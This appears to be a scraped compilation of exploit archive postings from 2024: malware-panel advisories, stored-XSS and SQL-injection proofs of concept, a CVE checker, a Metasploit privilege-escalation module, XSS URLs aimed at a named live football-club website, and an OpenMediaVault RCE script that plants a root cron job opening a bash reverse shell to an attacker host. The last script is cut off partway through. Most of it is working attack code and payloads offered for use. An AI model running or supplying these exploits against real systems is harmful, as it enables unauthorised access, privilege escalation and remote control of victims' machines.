<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024<br />Original source: https://malvuln.com/advisory/2337b9a12ecf50b94fc95e6ac34b3ecc.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.AsyncRat<br />Vulnerability: Arbitrary Code Execution<br />Description: The malware looks for and executes a x32-bit "CRYPTSP.dll" PE file in its current directory. Therefore, we can hijack the DLL and execute our own code to intercept and terminate the malware. Once loaded the exploit dll will check if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. Leverage RansomLord v3 for DLL generation, while written as a proof-of-concept to specifically defeat ransomware, it can also be used to generate DLLs to try an exploit other types of malwares. All basic tests were conducted successfully in a virtual machine environment.<br />Family: AsyncRat<br />Type: PE32<br />MD5: 2337b9a12ecf50b94fc95e6ac34b3ecc<br />SHA256: 3c703ecb3e8c54e352ff39fadbe789bb2313f848bd69551b07bf2ed0a58744b9<br />Vuln ID: MVID-2024-0683<br />Disclosure: 05/14/2024<br /><br />Exploit/PoC:<br />1) Download RansomLord v3<br /> https://github.com/malvuln/RansomLord<br />2) Locate the x32 CRYPTSP.dll entry using the -m flag (DLL Map)<br />3) Use -g flag (Generate Exploit) to output an x32 DLL CRYPTSP.dll, based on an existing vulnerable malware in the victims list.<br />4) (Optional) -e flag to setup Windows event IOC logging in the registry, this will log the SHA256 hash, full path and filename.<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>import requests<br />import argparse<br />from bs4 import BeautifulSoup<br />from urllib.parse import urlparse, parse_qs, urlencode, urlunparse<br />from requests.exceptions import RequestException<br /><br />class Colors:<br /> RED = '\033[91m'<br /> GREEN = '\033[1;49;92m'<br /> RESET = '\033[0m'<br /><br />def get_cluster_manager_url(base_url, path):<br /> print(Colors.GREEN + f"Preparing the groundwork for the exploitation on {base_url}..." + Colors.RESET)<br /> try:<br /> response = requests.get(base_url + path)<br /> response.raise_for_status()<br /> except requests.exceptions.RequestException as e:<br /> print(Colors.RED + f"Error: {e}" + Colors.RESET)<br /> return None<br /><br /> print(Colors.GREEN + f"Starting exploit check on {base_url}..." + Colors.RESET)<br /><br /> if response.status_code == 200:<br /> print(Colors.GREEN + f"Check executed successfully on {base_url}..." + Colors.RESET)<br /> # Use BeautifulSoup to parse the HTML content<br /> soup = BeautifulSoup(response.text, 'html.parser')<br /><br /> # Find all 'a' tags with 'href' attribute<br /> all_links = soup.find_all('a', href=True)<br /><br /> # Search for the link containing the Alias parameter in the href attribute<br /> cluster_manager_url = None<br /> for link in all_links:<br /> parsed_url = urlparse(link['href'])<br /> query_params = parse_qs(parsed_url.query)<br /> alias_value = query_params.get('Alias', [None])[0]<br /><br /> if alias_value:<br /> print(Colors.GREEN + f"Alias value found" + Colors.RESET)<br /> cluster_manager_url = link['href']<br /> break<br /><br /> if cluster_manager_url:<br /> print(Colors.GREEN + f"Preparing the injection on {base_url}..." + Colors.RESET)<br /> return cluster_manager_url<br /> else:<br /> print(Colors.RED + f"Error: Alias value not found on {base_url}..." + Colors.RESET)<br /> return None<br /><br /> print(Colors.RED + f"Error: Unable to get the initial step on {base_url}")<br /> return None<br /><br />def update_alias_value(url):<br /> parsed_url = urlparse(url)<br /> query_params = parse_qs(parsed_url.query, keep_blank_values=True)<br /> query_params['Alias'] = ["<DedSec-47>"]<br /> updated_url = urlunparse(parsed_url._replace(query=urlencode(query_params, doseq=True)))<br /> print(Colors.GREEN + f"Injection executed successfully on {updated_url}" + Colors.RESET)<br /> return updated_url<br /><br />def check_response_for_value(url, check_value):<br /> response = requests.get(url)<br /> if check_value in response.text:<br /> print(Colors.RED + "Website is vulnerable POC by :")<br /> print(Colors.GREEN + """<br /> ____ _ ____ _ _ _____ <br /> | _ \ ___ __| / ___| ___ ___ | || |___ |<br /> | | | |/ _ \/ _` \___ \ / _ \/ __| ____| || | / / <br /> | |_| | __/ (_| |___) | __/ (_ |____|__ | / / <br /> |____/ \___|\__,_|____/ \___|\___| |_|/_/ <br /> github.com/DedSec-47 """)<br /> else:<br /> print(Colors.GREEN + "Website is not vulnerable POC by :")<br /> print(Colors.GREEN + """<br /> ____ _ ____ _ _ _____ <br /> | _ \ ___ __| / ___| ___ ___ | || |___ |<br /> | | | |/ _ \/ _` \___ \ / _ \/ __| ____| || | / / <br /> | |_| | __/ (_| |___) | __/ (_ |____|__ | / / <br /> |____/ \___|\__,_|____/ \___|\___| |_|/_/ <br /> github.com/DedSec-47 """)<br /><br />def main():<br /> # Create a command-line argument parser<br /> parser = argparse.ArgumentParser(description="python CVE-2023-6710.py -t https://example.com -u /cluster-manager")<br /><br /> # Add a command-line argument for the target (-t/--target)<br /> parser.add_argument('-t', '--target', help='Target domain (e.g., https://example.com)', required=True)<br /><br /> # Add a command-line argument for the URL path (-u/--url)<br /> parser.add_argument('-u', '--url', help='URL path (e.g., /cluster-manager)', required=True)<br /><br /> # Parse the command-line arguments<br /> args = parser.parse_args()<br /><br /> # Get the cluster manager URL from the specified website<br /> cluster_manager_url = get_cluster_manager_url(args.target, args.url)<br /><br /> # Check if the cluster manager URL is found<br /> if cluster_manager_url:<br /> # Modify the URL by adding the cluster manager value<br /> modified_url = args.target + cluster_manager_url<br /> modified_url = update_alias_value(args.target + cluster_manager_url)<br /> print(Colors.GREEN + "Check executed successfully" + Colors.RESET)<br /><br /> # Check the response for the value "<DedSec-47>"<br /> check_response_for_value(modified_url, "<DedSec-47>")<br /><br />if __name__ == "__main__":<br /> main()<br /> <br /><br /></code></pre>
<pre><code># Chyrp 2.5.2 - Stored Cross-Site Scripting (XSS)<br /># Date: 2024-04-24<br /># Exploit Author: Ahmet Ümit BAYRAM<br /># Vendor Homepage: https://github.com/chyrp/<br /># Software Link: https://github.com/chyrp/chyrp/archive/refs/tags/v2.5.2.zip<br /># Version: 2.5.2<br /># Tested on: MacOS<br /><br />### Steps to Reproduce ###<br /><br />- Login from the address: http://localhost/chyrp/?action=login.<br />- Click on 'Write'.<br />- Type this payload into the 'Title' field: "><img src=x onerror=alert(<br />"Stored")><br />- Fill in the 'Body' area and click 'Publish'.<br />- An alert message saying "Stored" will appear in front of you.<br /><br />### PoC Request ###<br /><br />POST /chyrp/admin/?action=add_post HTTP/1.1<br />Host: localhost<br />Cookie: ChyrpSession=c4194c16a28dec03e449171087981d11;<br />show_more_options=true<br />User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)<br />Gecko/20100101 Firefox/124.0<br />Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,<br />*/*;q=0.8<br />Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3<br />Accept-Encoding: gzip, deflate, br<br />Content-Type: multipart/form-data;<br />boundary=---------------------------28307567523233313132815561598<br />Content-Length: 1194<br />Origin: http://localhost<br />Referer: http://localhost/chyrp/admin/?action=write_post<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br />Te: trailers<br />Connection: close<br /><br />-----------------------------28307567523233313132815561598<br />Content-Disposition: form-data; name="title"<br /><br />"><img src=x onerror=alert("Stored")><br />-----------------------------28307567523233313132815561598<br />Content-Disposition: form-data; name="body"<br /><br /><p>1337</p><br />-----------------------------28307567523233313132815561598<br />Content-Disposition: form-data; name="status"<br /><br />public<br />-----------------------------28307567523233313132815561598<br />Content-Disposition: form-data; name="slug"<br /><br /><br />-----------------------------28307567523233313132815561598<br />Content-Disposition: form-data; name="created_at"<br /><br />04/24/24 12:31:57<br />-----------------------------28307567523233313132815561598<br />Content-Disposition: form-data; name="original_time"<br /><br />04/24/24 12:31:57<br />-----------------------------28307567523233313132815561598<br />Content-Disposition: form-data; name="trackbacks"<br /><br /><br />-----------------------------28307567523233313132815561598<br />Content-Disposition: form-data; name="feather"<br /><br />text<br />-----------------------------28307567523233313132815561598<br />Content-Disposition: form-data; name="hash"<br /><br />11e11aba15114f918ec1c2e6b8f8ddcf<br />-----------------------------28307567523233313132815561598--<br /><br /><br /></code></pre>
<pre><code># Leafpub 1.1.9 - Stored Cross-Site Scripting (XSS)<br /># Date: 2024-04-24<br /># Exploit Author: Ahmet Ümit BAYRAM<br /># Vendor Homepage: https://github.com/Leafpub<br /># Software Link: https://github.com/Leafpub/leafpub<br /># Version: 1.1.9<br /># Tested on: MacOS<br /><br />### Steps to Reproduce ###<br /><br />- Please login from this address: http://localhost/leafpub/admin/login<br />- Click on the Settings > Advanced<br />- Enter the following payload into the "Custom Code" area and save it: ("><img<br />src=x onerror=alert("Stored")>)<br />- An alert message saying "Stored" will appear in front of you.<br /><br />### PoC Request ###<br /><br />POST /leafpub/api/settings HTTP/1.1<br />Host: localhost<br />Cookie:<br />authToken=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE3MTM5NjQ2MTcsImV4cCI6MTcxMzk2ODIxNywiZGF0YSI6eyJ1c2VybmFtZSI6ImFkbWluIn19.967N5NYdUKxv1sOXO_OTFiiLlm7sfgDWPXKX7iEZwlo<br />User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)<br />Gecko/20100101 Firefox/124.0<br />Accept: */*<br />Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3<br />Accept-Encoding: gzip, deflate, br<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 476<br />Origin: http://localhost<br />Referer: http://localhost/leafpub/admin/settings<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br />Te: trailers<br />Connection: close<br /><br />title=A+Leafpub+Blog&tagline=Go+forth+and+create!&homepage=&twitter=&theme=range&posts-per-page=10&cover=source%2Fassets%2Fimg%2Fleaves.jpg&logo=source%2Fassets%2Fimg%2Flogo-color.png&favicon=source%2Fassets%2Fimg%2Flogo-color.png&language=en-us&timezone=America%2FNew_York&default-title=Untitled+Post&default-content=Start+writing+here...&head-code=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%22Stored%22)%3E&foot-code=&generator=on&mailer=default&maintenance-message=&hbs-cache=on<br /><br /></code></pre>
<pre><code># Exploit : Prison Management System Using PHP -SQL Injection Authentication Bypass<br /># Date: 15/03/2024<br /># Exploit Author: Sanjay Singh<br /># Vendor Homepage: https://www.sourcecodester.com<br /># Software Link:https://www.sourcecodester.com/sql/17287/prison-management-system.html<br /># Tested on: Windows ,XAMPP<br /># CVE : CVE-2024-33288<br /><br /><br /># Proof of Concept:<br />Step 1-Visit http://localhost/prison/<br />Step 2 - Click on Admin Dashboard button and redirect on login page.<br />Step 3– Enter username as admin' or '1'='1 and password as 123456<br />Step 4 – Click sing In and now you will be logged in as admin.<br /><br /><br /></code></pre>
<pre><code># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Local<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::EXE<br /> include Msf::Exploit::FileDropper<br /> include Msf::Post::File<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Kemp LoadMaster Local sudo privilege escalation',<br /> 'Description' => %q{<br /> This module abuses a feature of the sudo command on Progress Kemp<br /> LoadMaster. Certain binary files are allowed to automatically elevate<br /> with the sudo command. This is based off of the file name. Some files<br /> have this permission are not write-protected from the default 'bal' user.<br /> As such, if the file is overwritten with an arbitrary file, it will still<br /> auto-elevate. This module overwrites the /bin/loadkeys file with another<br /> executable.<br /> },<br /> 'Author' => [<br /> 'Dave Yesland with Rhino Security Labs',<br /> 'bwatters-r7' # module,<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'References' => [<br /> ['URL', 'https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/'],<br /> ['URL', 'https://kemptechnologies.com/kemp-load-balancers']<br /> ],<br /> 'DisclosureDate' => '2024-03-19',<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE ],<br /> 'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK],<br /> 'Reliability' => [ REPEATABLE_SESSION ]<br /> },<br /> 'SessionTypes' => ['shell', 'meterpreter'],<br /> 'Platform' => ['unix', 'linux'],<br /> 'Targets' => [<br /> [<br /> 'Dropper',<br /> {<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Type' => :dropper,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'<br /> }<br /> }<br /> ],<br /> [<br /> 'Command',<br /> {<br /> 'Arch' => [ARCH_CMD],<br /> 'Type' => :command,<br /> 'Payload' =><br /> {<br /> 'BadChars' => "\x27",<br /> 'Compat' =><br /> {<br /> 'PayloadType' => 'cmd',<br /> 'RequiredCmd' => 'generic gawk telnet ssh echo'<br /> }<br /> },<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse'<br /> }<br /> }<br /> ]<br /> ],<br /> 'Privileged' => true<br /> )<br /> )<br /> register_options([<br /> OptString.new('TARGET_BINARY', [true, 'The path for a binary file that has permission to auto-elevate.', '/bin/loadkeys']),<br /> OptString.new('WRITABLE_DIR', [ true, 'A directory where we can write files', '/tmp' ])<br /> ])<br /> end<br /><br /> def check<br /> score = 0<br /> score += 1 if read_file('/usr/wui/index.js').include?('KEMP')<br /> score += 1 if read_file('/etc/motd').include?('Kemp LoadMaster')<br /> score += 1 if exists?('/usr/wui/eula.kemp.html')<br /> vprint_status("Found #{score} indicators this is a KEMP product")<br /> return CheckCode::Detected if score > 0<br /><br /> return CheckCode::Safe<br /> end<br /><br /> def verify_copy(src, dest, elevate)<br /> orig_file_hash = file_remote_digestmd5(src)<br /> vprint_status("Moving #{src} to #{dest}")<br /> if elevate<br /> output = cmd_exec("sudo /bin/cp '#{src}' '#{dest}'")<br /> else<br /> output = cmd_exec("/bin/cp '#{src}' '#{dest}'")<br /> end<br /> return true if file_remote_digestmd5(dest) == orig_file_hash<br /><br /> print_bad("Copy failed - #{output}")<br /> false<br /> end<br /><br /> def execute_dropper(target_binary, binary_rename, temp_payload_path)<br /> vprint_status("Writing payload to #{temp_payload_path}")<br /> write_file(temp_payload_path, generate_payload_exe)<br /> chmod(temp_payload_path)<br /> register_file_for_cleanup(temp_payload_path)<br /> return unless verify_copy(target_binary, binary_rename, false)<br /> return unless verify_copy(temp_payload_path, target_binary, true)<br /><br /> vprint_status("Running #{target_binary}")<br /> cmd_exec("sudo '#{target_binary}'")<br /> end<br /><br /> def execute_command(target_binary, binary_rename, cmd)<br /> vprint_status('Preparing payload command')<br /> # save copy of target_binary<br /> return unless verify_copy(target_binary, binary_rename, false)<br /> return unless verify_copy('/bin/bash', target_binary, true)<br /><br /> vprint_status('Running payload command')<br /> vprint_status(cmd_exec("sudo #{target_binary} -c '#{cmd}'"))<br /> end<br /><br /> def exploit<br /> writable_dir = datastore['WRITABLE_DIR']<br /> if writable_dir.blank? || (writable_dir[-1] != '/')<br /> writable_dir += '/'<br /> end<br /> fail_with(Failure::BadConfig, "Invalid WRITABLE_DIR: #{writable_dir}") unless directory?(writable_dir)<br /> target_binary = datastore['TARGET_BINARY']<br /> binary_rename = writable_dir + ".#{Rex::Text.rand_text_alpha_lower(6..12)}"<br /> target_binary_hash = file_remote_digestmd5(target_binary)<br /> begin<br /> case target['Type']<br /> when :dropper<br /> temp_payload = writable_dir + ".#{Rex::Text.rand_text_alpha_lower(6..12)}"<br /> execute_dropper(target_binary, binary_rename, temp_payload)<br /> when :command<br /> execute_command(target_binary, binary_rename, payload.encoded)<br /> end<br /> ensure<br /> unless target_binary_hash == file_remote_digestmd5(target_binary)<br /> cmd_exec("sudo rm '#{target_binary}'")<br /> verify_copy(binary_rename, target_binary, true)<br /> cmd_exec("sudo rm '#{binary_rename}'")<br /> end<br /> end<br /> if target_binary_hash == file_remote_digestmd5(target_binary)<br /> print_good("#{target_binary} returned to original contents")<br /> else<br /> print_bad("#{target_binary} was not returned to original contents")<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024<br />Original source: https://malvuln.com/advisory/4b5fc3a2489985f314b81d35eac3560f_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Panel.SmokeLoader <br />Vulnerability: Cross Site Request Forgery (CSRF) - Persistent XSS<br />Family: SmokeLoader <br />Type: Web Panel <br />MD5: 4b5fc3a2489985f314b81d35eac3560f (control.php)<br />SHA256: 8d02238577081be74b9ebc1effcfbf3452ffdb51f130398b5ab875b9bfe17743<br />Vuln ID: MVID-2024-0682<br />Disclosure: The smokebot admin web panel is written in PHP for remote administration capability.<br /><br />The panel has multiple features like Bot List, Task List, Stealer, Miner, Email Grab, KeyLogger etc. The "control.php" PHP page contains an HTML FORM using POST method, however there is no CSRF security token used by the FORM. This is a unique token per session within the FORM, used as a challenge to the server to help prevent cross-site-scripting attacks. Therefore, third-party adversaries who can lure a panel user to visit an attacker controlled webpage or click an infected link may result in the panel users submitting FORMS on an attackers behalf. This may result in code execution, data theft, GEO location disclosure. The CSRF to XSS results in stored JS payload in the smoke MySQL database table "plugins".<br /><br />hash fgfilter fakedns_rules filesearch_rules procmon_rules ddos_rules keylog_rules fgcookies miner_rules <br />93666df0833e0b63917e5373812613 0 ""/%3E%3Cscript%3Ewindow.open("https://www.malvuln.com/l...<br /><br /><br />Exploit/PoC:<br />1) CSRF to add your own Miner Pool<br /><br />%3Cform method="post" action="http://127.0.0.1/Panel.SmokeLoader/SmokeLoader/Smoke/control1.php?page=miner"%3E<br />Pool: %3Cinput type="input" name="miner_pool" size="30" value="MyPoolFool:666"%3E <br />Login: %3Cinput type="input" name="miner_login" size="20" value="gg"%3E<br />Password: %3Cinput type="input" name="miner_pass" size="20" value="malvuln"%3E<br />%3Cinput type="hidden" name="mode" value="miner"%3E<br />%3Cinput type="submit" value="SAVE"%3E<br />%3Cscript%3Edocument.forms[0].submit()%3C/script%3E<br />%3C/form%3E<br /><br />2) CSRF to Persistent XSS<br /><br />%3Cform method="post" action="http://127.0.0.1/Panel.SmokeLoader/SmokeLoader/Smoke/control1.php?page=miner"%3E<br />Pool: %3Cinput type="input" name="miner_pool" size="300" value='""/%3E%3Cscript%3Ewindow.open("https://www.malvuln.com/log.php")%3C/script%3E"'%3E <br />Login: %3Cinput type="input" name="miner_login" size="20" value="gg"%3E<br />Password: %3Cinput type="input" name="miner_pass" size="20" value="malvuln"%3E<br />%3Cinput type="hidden" name="mode" value="miner"%3E<br />%3Cinput type="submit" value="SAVE"%3E<br />%3Cscript%3Edocument.forms[0].submit()%3C/script%3E<br />%3C/form%3E<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024<br />Original source: https://malvuln.com/advisory/4b5fc3a2489985f314b81d35eac3560f.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Panel.SmokeLoader <br />Vulnerability: Cross Site Scripting (XSS)<br />Family: SmokeLoader <br />Type: Web Panel <br />MD5: 4b5fc3a2489985f314b81d35eac3560f (control.php)<br />SHA256: 8d02238577081be74b9ebc1effcfbf3452ffdb51f130398b5ab875b9bfe17743<br />Vuln ID: MVID-2024-0681<br />Disclosure: 05/11/2024<br />Description: The smokebot admin web panel is written in PHP for remote administration capability. The panel has multiple features like Bot List, Task List, Stealer, Miner, Email Grab, KeyLogger etc. The "control.php" PHP page contains an HTML FORM that uses $_SERVER["PHP_SELF"] for the form action method. This is a super global variable that returns the filename of the currently executing script. There is no secure coding practices of filtering input or sanitization of output e.g "htmlspecialchars()". Therefore, panel users who visit a third-party adversary website or click an infected link, can trigger arbitrary client side JS code execution in the security context of the current user. This can result in data theft or GEO location disclosure of the user accessing the smokebot web interface.<br /><br />PHP snippet.<br /><br />if ($_GET["mode"] === "reports"){<br /> $url_pattern = $_GET["logs_sru"];<br /> $id_pattern = $_GET["logs_sri"];<br /><br />$action = $_SERVER["PHP_SELF"]."?page=stealer&mode=reports";<br />%3Cform method=\"get\" action=\"{$action}\"%3E<br /><br />Interestingly, they use PHP function htmlspecialchars() when retrieving data from the "smoke bot" MySQL database.<br /><br />$r = mysqli_query($dbcon,"SELECT * FROM `stealer` WHERE `cname`='{$id}'");<br /> while ($v = mysqli_fetch_assoc($r)){<br /> $stealer_host = htmlspecialchars($v["host"]);<br /><br />However, it doesn't wrap $_SERVER["PHP_SELF"] on the action method for the FORM {$action} variable that handles user input.<br /><br />Exploit/PoC:<br />1) http://x.x.x.x/SmokeLoader/control1.php?page=stealer&mode=reports&logs_sri=%22/%3E%3Cscript%3Ewindow.open("https://malvuln.com")%3C/script%3E&logs_sru=&next=1<br />2) http://x.x.x.x/SmokeLoader/control1.php?page=fgrab&mode=reports&forms_sri=%22/%3E%3Cscript%3Ealert((document.cookie)%3C/script%3E<br />3) http://x.x.x.x/SmokeLoader/control1.php?page=fgrab&mode=reports&forms_sru=%22/%3E%3Cscript%3Ewindow.open('https://hyp3rlinx.altervista.org/')%3C/script%3E<br />4) http://x.x.x.x/SmokeLoader/control1.php?page=fgrab&mode=reports&forms_srd=%22/%3E%3Cscript%3Ealert(%22malvuln%22)%3C/script%3E<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code><br />EXPLOIT XSS Esteghlal F.C. (باشگاه فوتبال استقلال تهران) Site<br /><br />https://fcesteghlal.ir suffers from a remote XSS vulnerability.<br />This security incident was reported by the SOC and Maher team and prevention centers and was ignored<br />this site has not responded to their reports so we are posting this to add visibility to the issue.<br /><br />###################################################################################################<br /># #<br /># Exploit Title : The Tehran Independence Club site, which is a government site "belonging to the government of the Islamic Republic of Iran", has an XSS INJECTION vulnerability. #<br /># #<br /># Author : E1.Coders #<br /># #<br /># Contact : E1.Coders [at] Mail [dot] RU #<br /># #<br /># Portal Link : https://fcesteghlal.ir/ #<br /># #<br /># Security Risk : high #<br /># #<br /># Description : All sites coded and designed by novinvision #<br /># #<br /># DorK : fcesteghlal.ir/search?term= #<br /># #<br />###################################################################################################<br /># #<br /># Expl0iTs: https://fcesteghlal.ir/search?term=<img+src/onerror=prompt(8)><br />#<br /># https://fcesteghlal.ir/search?term=<script>alert('Hacked+By+E1.Coders')</script><br /></code></pre>
<pre><code># Exploit Title: Openmediavault < 7.0.32 Authenticated RCE & Local Privilege Escalation<br /># Date: 08.05.2024<br /># Exploit Author: Mert BENADAM<br /># Vendor Homepage: https://www.openmediavault.org/<br /># Software Link: https://sourceforge.net/projects/openmediavault/<br /># Version: < 7.0.32<br /># Tested on: OMV 7.0.32 & 6.5 @Virtual Machine<br /># Description: OpenMediaVault is the next generation network attached storage (NAS) solution based on Debian Linux.<br /><br /><br /># Special Thx: k3yZ :)<br />"""<br />PoC:<br />This vulnerability occurs when users in the web-admin group enter commands on the crontab by selecting the root shell.<br />As a result of exploiting the vulnerability,authenticated web-admin users can run commands with root privileges and receive reverse shell connections.<br />It can also be used in privilege escalation attacks on local systems.<br />"""<br /><br />import argparse<br />import requests<br />import json<br /><br />def login(ip_address, username, password, lhost, lport):<br /> try:<br /> login_data = {<br /> "service": "Session",<br /> "method": "login",<br /> "params": {<br /> "username": username,<br /> "password": password<br /> },<br /> "options": None<br /> }<br /><br /> url = f"http://{ip_address}/rpc.php"<br /><br /> response = requests.post(url, json=login_data)<br /><br /> if response.status_code == 200:<br /> print("Login Success , Checking User Privilages...")<br /> post_check(ip_address, response.cookies, lhost , lport)<br /> else:<br /> print("login Failed, Probably Wrong User Credentials...")<br /><br /> print("Reason:")<br /> print(response.json())<br /><br /> except requests.exceptions.ConnectionError:<br /> print("Connection Error: Could Not Connect To The Server...")<br /> except Exception as e:<br /> print("Unexpected Error:", e)<br /><br />def post_check(ip_address, cookies, lhost, lport):<br /> try:<br /> post_data = {<br /> "service": "Cron",<br /> "method": "getList",<br /> "params": {<br /> "type": ["userdefined"],<br /> "start": 0,<br /> "limit": -1<br /> },<br /> "options": None<br /> }<br /><br /> url = f"http://{ip_address}/rpc.php"<br /> response = requests.post(url, json=post_data, cookies=cookies)<br /><br /><br /><br /> if response.status_code == 200:<br /> print("Accesing Crons...OK")<br /> send_post(ip_address, cookies, lhost , lport)<br /><br /><br /> elif response.status_code == 403:<br /> print("Kullanıcı yetkili değil.")<br /> else:<br /> print("Post Request Failure...")<br /><br /> except requests.exceptions.ConnectionError:<br /> print("Connection Error: Could Not Connect To The Server...")<br /> except Exception as e:<br /> print("Beklenmeyen bir hata oluştu:", e)<br /><br />def send_post(ip_address, cookies, lhost , lport):<br /> try:<br /><br /><br /> post_data = {<br /> "service": "Cron",<br /> "method": "set",<br /> "params": {<br /> "uuid": "fa4b1c66-ef79-11e5-87a0-0002b3a176b4", # UUID<br /> "enable": True,<br /> "execution": "exactly",<br /> "minute": ["*"],<br /> "everynminute": False,<br /> "hour": ["*"],<br /> "everynhour": False,<br /> "dayofmonth": ["*"],<br /> "everyndayofmonth": False,<br /> "month": ["*"],<br /> "dayofweek": ["*"],<br /> "username": "root",<br /> "command": f"bash -c 'exec bash -i &>/dev/tcp/{lhost}/{lport} <&1'", # Command From User<br /> "sendemail": False,<br /> "comment": "",<br /> "type": "userdefined"<br /> },<br /> "options": None<br /> }<br /><br /> url = f"http://{ip_address}/rpc.php"<br /> response = requests.post(url, json=post_data, cookies=cookies)<br /><br /> if response.status_code == 200:<br /> print("Payload Sent... OK,")<br /> update(ip_address, cookies)<br /> elif response.status_code == 403:<br /> print("User Not Authrorized.")<br /> else:<br /> print("Something Wrong.CHECK your version...")<br /><br /><br /> except requests.exceptions.ConnectionError:<br /> print("Connection Error: Could Not Connect To The Server...")<br /> except Exception as e:<br /> print("Unexpected Error:", e)<br /><br /><br />def update(ip_address, cookies):<br /> try:<br /><br /> post_data = {<br /> "service": "Config",<br /> "method": "applyChangesBg",<br /> "params": {<br /> "modules": [],<br /> "force": False<br /> },<br /> "options": None<br /> }<br /><br /><br /> url = f"http://{ip_address}/rpc.php"<br /><br /> response = requests.post(url, json=post_data, cookies=cookies)<br /><br /> if response.status_code == 200:<br /> print("Updating crontabs...")<br /> print("Successfully Exploited...")<br /> print("Exploited Shell Will Be Triggered In 1 Minute, Check Your Listener...")<br /> print("Warning: Make sure You Open a listener And Enter Correct IP-PORT Information...")<br /> elif response.status_code == 403:<br /> print("User Not Authrorized.")<br /> else:<br /> print("Someting Wrong. Check version...")<br /><br /> except requests.exceptions.ConnectionError:<br /> print("Connection Error: Could Not Connect To The Server...")<br /> except Exception as e:<br /> print("Unexpected Error:", e)<br /><br /><br />def main():<br /> font="""<br /><br />███╗ ██╗ ██████╗ ███╗ ███╗███████╗██████╗ ██████╗██╗ ██╗ ██████╗ ██████╗<br />████╗ ██║██╔═══██╗████╗ ████║██╔════╝██╔══██╗██╔════╝╚██╗ ██╔╝██╔═████╗██╔═████╗<br />██╔██╗ ██║██║ ██║██╔████╔██║█████╗ ██████╔╝██║ ╚████╔╝ ██║██╔██║██║██╔██║<br />██║╚██╗██║██║ ██║██║╚██╔╝██║██╔══╝ ██╔══██╗██║ ╚██╔╝ ████╔╝██║████╔╝██║<br />██║ ╚████║╚██████╔╝██║ ╚═╝ ██║███████╗██║ ██║╚██████╗ ██║ ╚██████╔╝╚██████╔╝<br />╚═╝ ╚═══╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═════╝ ╚═════╝<br /><br /> """<br /> parser = argparse.ArgumentParser(description="OpenMediaVault 7.0.32 > 6.5.0 RCE And Local Privilage Escalation")<br /> parser.add_argument("-U", "--ip", type=str, help="Victim Ip Adress", required=False)<br /> 